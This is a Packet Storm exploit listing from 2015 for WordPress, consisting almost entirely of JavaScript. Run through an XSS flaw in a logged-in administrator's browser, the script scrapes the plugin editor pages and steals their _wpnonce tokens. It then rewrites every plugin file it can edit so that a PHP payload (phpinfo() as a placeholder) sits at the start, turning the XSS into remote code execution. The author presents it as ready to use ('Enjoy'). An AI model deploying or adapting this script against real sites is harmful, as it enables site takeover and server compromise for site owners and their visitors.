WordPress 4.2.1 XSS / Code Execution

2015-05-05T00:00:00
ID PACKETSTORM:131769
Type packetstorm
Reporter Evex
Modified 2015-05-05T00:00:00

Description

                                        
                                            `/*  
Author: @Evex_1337  
Title: Wordpress XSS to RCE  
Description: This Exploit Uses XSS Vulnerabilities in Wordpress  
Plugins/Themes/Core To End Up Executing Code After The Being Triggered With  
Administrator Previliged User. ¯\_(ツ)_/¯  
Reference: http://research.evex.pw/?vuln=14  
Enjoy.  
  
*/  
//Installed Plugins Page  
plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ?  
'plugins.php' : 'wp-admin/plugins.php';  
//Inject "XSS" Div  
jQuery('body').append('<div id="xss" ></div>');  
xss_div = jQuery('#xss');  
xss_div.hide();  
//Get Installed Plugins Page Source and Append it to "XSS" Div  
jQuery.ajax({  
url: plugins,  
type: 'GET',  
async: false,  
cache: false,  
timeout: 30000,  
success: function (txt) {  
xss_div.html(txt);  
}  
});  
//Put All Plugins Edit URL in Array  
plugins_edit = [  
];  
xss_div.find('a').each(function () {  
if (jQuery(this).attr('href').indexOf('?file=') != - 1) {  
plugins_edit.push(jQuery(this).attr('href'));  
}  
});  
//Inject Payload  
for (var i = 0; i < plugins_edit.length; i++) {  
jQuery.ajax({  
url: plugins_edit[i],  
type: 'GET',  
async: false,  
cache: false,  
timeout: 30000,  
success: function (txt) {  
xss_div.html(txt);  
_wpnonce =  
jQuery('form#template').context.body.innerHTML.match('name="_wpnonce"  
value="(.*?)"') [1];  
old_code = jQuery('form#template div textarea#newcontent') [0].value;  
payload = '<?php phpinfo(); ?>';  
new_code = payload + '\n' + old_code;  
file = plugins_edit[i].split('file=') [1];  
jQuery.ajax({  
url: plugins_edit[i],  
type: 'POST',  
data: {  
'_wpnonce': _wpnonce,  
'newcontent': new_code,  
'action': 'update',  
'file': file,  
'submit': 'Update File'  
},  
async: false,  
cache: false,  
timeout: 30000,  
success: function (txt) {  
xss_div.html(txt);  
if (jQuery('form#template div textarea#newcontent')  
[0].value.indexOf(payload) != - 1) {  
// Passed, this is up to you ( skiddies Filter :D )  
injected_file = window.location.href.split('wp-admin') [0] +  
'/wp-content/plugins/' + file; //  
http://localhost/wp//wp-content/plugins/504-redirects/redirects.php  
throw new Error('');  
}  
}  
});  
}  
});  
}  
`